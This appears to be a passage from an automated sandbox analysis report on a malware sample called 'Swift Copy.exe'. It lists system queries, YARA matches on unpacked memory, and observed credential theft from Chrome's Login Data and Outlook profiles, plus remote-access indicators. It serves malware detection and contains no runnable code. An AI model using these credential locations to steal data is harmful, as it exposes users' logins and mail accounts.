Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY